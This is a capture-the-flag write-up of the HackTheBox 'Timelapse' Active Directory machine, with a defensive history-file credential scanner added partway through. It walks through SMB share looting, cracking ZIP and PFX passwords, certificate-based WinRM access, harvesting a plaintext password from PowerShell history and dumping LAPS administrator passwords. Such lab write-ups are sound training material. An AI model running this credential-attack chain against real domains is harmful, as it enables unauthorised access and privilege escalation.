HackTheBox – Timelapse Write-up

Hi everyone! This is a Windows machine that only tests Active Directory related content during privilege escalation. For initial access, we have to enumerate SMB for a password-protected ZIP file which stores a password-protected PFX file. After cracking both with zip2john and crackpkcs12, we extract a certificate and private key from the PFX file for WinRM login. Once logged in, we have to enumerate the PowerShell command history file to pivot to another account that has LAPS read access. With LAPS read access, we will be able to obtain the local administrator's password. Let's get started!

1. Nmap enumeration

$ sudo nmap -sC -sV -p- 10.10.11.152         
PORT      STATE SERVICE           VERSION
53/tcp    open  domain            Simple DNS Plus
88/tcp    open  kerberos-sec      Microsoft Windows Kerberos (server time: 2022-07-15 10:09:34Z)
135/tcp   open  msrpc             Microsoft Windows RPC
139/tcp   open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp   open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
3268/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
5986/tcp  open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after:  2022-10-25T14:25:29
|_ssl-date: 2022-07-15T10:11:07+00:00; +7h59m59s from scanner time.
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf            .NET Message Framing
49667/tcp open  msrpc             Microsoft Windows RPC
49673/tcp open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc             Microsoft Windows RPC
49696/tcp open  msrpc             Microsoft Windows RPC
56370/tcp open  msrpc             Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-07-15T10:10:30
|_  start_date: N/A

2. SMB enumeration

Since port 445 is open, I decided to check whether we can view any content anonymously. True enough, we can read the "Shares" folder. When accessing the shared folder (just press ENTER when prompted for a password), I found two interesting things: a backup file for WinRM, and the LAPS installer with its documentation. Knowing that LAPS exists will probably be helpful for privilege escalation later.

$ smbmap -H 10.10.11.152 -u anonymous
[+] Guest session       IP: 10.10.11.152:445    Name: 10.10.11.152                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Shares                                                  READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
                                                                                                                                                                                                                    
$ smbclient \\\\10.10.11.152\\Shares
Enter WORKGROUP\kali's password:
smb: \> dir
  .                                   D        0  Mon Oct 25 11:39:15 2021
  ..                                  D        0  Mon Oct 25 11:39:15 2021
  Dev                                 D        0  Mon Oct 25 15:40:06 2021
  HelpDesk                            D        0  Mon Oct 25 11:48:42 2021

                6367231 blocks of size 4096. 2455198 blocks available
smb: \> cd Dev
smb: \Dev\> dir
  .                                   D        0  Mon Oct 25 15:40:06 2021
  ..                                  D        0  Mon Oct 25 15:40:06 2021
  winrm_backup.zip                    A     2611  Mon Oct 25 11:46:42 2021

                6367231 blocks of size 4096. 2455198 blocks available
smb: \Dev\> get winrm_backup.zip 
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec)
smb: \Dev\> cd ..
smb: \> cd HelpDesk\
smb: \HelpDesk\> dir
  .                                   D        0  Mon Oct 25 11:48:42 2021
  ..                                  D        0  Mon Oct 25 11:48:42 2021
  LAPS.x64.msi                        A  1118208  Mon Oct 25 10:57:50 2021
  LAPS_Datasheet.docx                 A   104422  Mon Oct 25 10:57:46 2021
  LAPS_OperationsGuide.docx           A   641378  Mon Oct 25 10:57:40 2021
  LAPS_TechnicalSpecification.docx      A    72683  Mon Oct 25 10:57:44 2021

3. Analysis of winrm_backup.zip

3.1 Crack and access winrm_backup.zip

When I tried to unzip the ZIP file, it prompted for a password.

$ unzip winrm_backup.zip 
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: 

We can easily crack the ZIP password using zip2john and john with the rockyou wordlist.

$ zip2john ./winrm_backup.zip > zip.hashes
$ sudo gunzip /usr/share/wordlists/rockyou.txt.gz
$ john ./zip.hashes --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy    (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-07-14 23:28) 3.125g/s 10854Kp/s 10854Kc/s 10854KC/s surfroxy154..supergay01
Use the "--show" option to display all of the cracked passwords reliably
Session completed

$ unzip winrm_backup.zip
Archive:  winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
  inflating: legacyy_dev_auth.pfx

3.2 Crack and read .pfx file

When I tried to read the .pfx file, a password prompt appeared.

$ openssl pkcs12 -info -in ./legacyy_dev_auth.pfx
Enter Import Password:

To crack the file, we will first have to install crackpkcs12. Copy and paste the following commands into the terminal.

git clone https://github.com/crackpkcs12/crackpkcs12.git
cd crackpkcs12*
./configure
make
sudo make install

Finally, we can start to crack it.

$ cd ..
$ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./legacyy_dev_auth.pfx

Dictionary attack - Starting 4 threads

*********************************************************
Dictionary attack - Thread 1 - Password found: thuglegacy
*********************************************************

Since we have the password, we can now extract the private key and the client certificate (the "public" half) from the PFX file.

$ openssl pkcs12 -in ./legacyy_dev_auth.pfx -nocerts -out private.pem -nodes 
Enter Import Password: thuglegacy
$ openssl pkcs12 -in ./legacyy_dev_auth.pfx -out public.pem -clcerts -nokeys 
Enter Import Password: thuglegacy

4. Initial access using winrm

We access the machine using evil-winrm with the extracted certificate and private key, without the need for a username or password. Ref: https://wadcoms.github.io/wadcoms/Evil-Winrm-PKINIT/

$ sudo gem install evil-winrm
$ evil-winrm -i 10.10.11.152 -c public.pem -k private.pem -S -r timelapse

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\legacyy\Documents> 

4.1 Obtaining the user flag

*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\legacyy\Desktop> dir


    Directory: C:\Users\legacyy\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/15/2022   5:27 AM             34 user.txt


*Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt
ca*****************************

5. Privilege escalation

5.1 Discovering another user

While looking at the user accounts available, I noticed another interesting user, svc_deploy. Looking at svc_deploy, we can see that it is part of the LAPS_Readers group. I didn't show the information for legacyy or the other user accounts here, but the account we are currently in is not part of that group and hence cannot read the local administrator's password.

*Evil-WinRM* PS C:\Users\legacyy\Documents> net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            babywyrm                 Guest
krbtgt                   legacyy                  payl0ad
sinfulz                  svc_deploy               thecybergeek               

The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy
User name                    svc_deploy
Full Name                    svc_deploy
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            10/25/2021 12:12:37 PM
Password expires             Never
Password changeable          10/26/2021 12:12:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   7/15/2022 5:57:46 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *LAPS_Readers         *Domain Users
The command completed successfully.

5.2 Getting login credentials via command history

While enumerating, I stumbled across svc_deploy's login credentials in the PowerShell console history file (PSReadline's ConsoleHost_history.txt).

*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
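
A history file like the one above is exactly the artifact a defender should be hunting for. The following Python script is an added example (not part of the original post): it scans the contents of a PSReadLine ConsoleHost_history.txt for plaintext credential patterns and for session options that disable TLS validation, and redacts the secret in its report. The sample history and the password in it are constructed placeholders modelled on this write-up.

```python
import re

# Constructed sample PSReadLine history modelled on the one in this write-up.
# The password and the cmdkey line are placeholders, not values from the box.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'Sample-Passw0rd!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
cmdkey /add:dc01 /user:svc_deploy /pass:Sample-Passw0rd!
exit
"""

# (finding name, regex). A "secret" group marks the literal to redact in the report.
RULES = [
    # A string literal converted with -AsPlainText is a password typed at the console.
    ("plaintext-securestring",
     re.compile(r"""(?=.*-AsPlainText)ConvertTo-SecureString\s+(?:-String\s+)?(?P<secret>'[^']*'|"[^"]*")""", re.I)),
    # A PSCredential built from a literal user name: its paired secure string usually came from plaintext.
    ("pscredential-literal", re.compile(r"""PSCredential\s*\(\s*(?P<user>'[^']*'|"[^"]*")""", re.I)),
    # cmdkey-style /pass:VALUE switches embed the password directly in the command line.
    ("inline-password-switch", re.compile(r"/pass(?:word)?:(?P<secret>\S+)", re.I)),
    # WinRM session options that disable TLS validation, as seen in the history on this box.
    ("tls-validation-disabled", re.compile(r"-Skip(?:CA|CN|Revocation)Check", re.I)),
]


def scan_history(text):
    """Return (line_no, finding, redacted_line) for every rule hit in a history file."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for name, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            shown = line
            secret = m.groupdict().get("secret")
            if secret:
                shown = line.replace(secret, "<redacted>")  # never echo the secret itself
            findings.append((line_no, name, shown))
    return findings


if __name__ == "__main__":
    for line_no, name, shown in scan_history(SAMPLE_HISTORY):
        print(f"line {line_no:>3}  {name:<24}  {shown}")
```

On a real host, feed it the contents of each user's %APPDATA%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt; a hit is a reason to rotate that credential, not just to delete the file.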

5.3 Login as svc_deploy

$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -r timelapse -s /home/kali

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Warning: User is not needed for Kerberos auth. Ticket will be used

Warning: Password is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> 

5.4 Obtaining local admin’s password via LAPS

We can easily obtain the LAPS password via the publicly available Get-LAPSPasswords.ps1 script. Remember to download it to your attacking machine before loading and running it. I already set the script path via the -s flag in evil-winrm before logging in to svc_deploy's account.

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords.ps1
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords


Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   : dc01.timelapse.htb
Stored     : 1
Readable   : 1
Password   : }-%o9e8]&333-n+(VEi30J-}
Expiration : 7/20/2022 10:52:04 AM

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Hostname   :
Stored     : 0
Readable   : 0
Password   :
Expiration : NA

Note that since the password is auto-generated by LAPS, the local administrator password you obtain will definitely be different from mine. You will have to log in to svc_deploy's account to retrieve the local administrator's password yourself.

5.5 Login as administrator

Since we have the password, we can now log in as Administrator.

$ evil-winrm -i 10.10.11.152 -u administrator -p '}-%o9e8]&333-n+(VEi30J-}' -S -r timelapse

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Warning: SSL enabled

Warning: User is not needed for Kerberos auth. Ticket will be used

Warning: Password is not needed for Kerberos auth. Ticket will be used

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> 

5.6 Obtaining the root flag

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir C:\Users


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/23/2021  11:27 AM                Administrator
d-----       10/25/2021   8:22 AM                legacyy
d-r---       10/23/2021  11:27 AM                Public
d-----       10/25/2021  12:23 PM                svc_deploy
d-----        2/23/2022   5:45 PM                TRX


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\TRX\Desktop
*Evil-WinRM* PS C:\Users\TRX\Desktop> dir 


    Directory: C:\Users\TRX\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        7/15/2022  10:52 AM             34 root.txt


*Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt
a5*****************************

I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
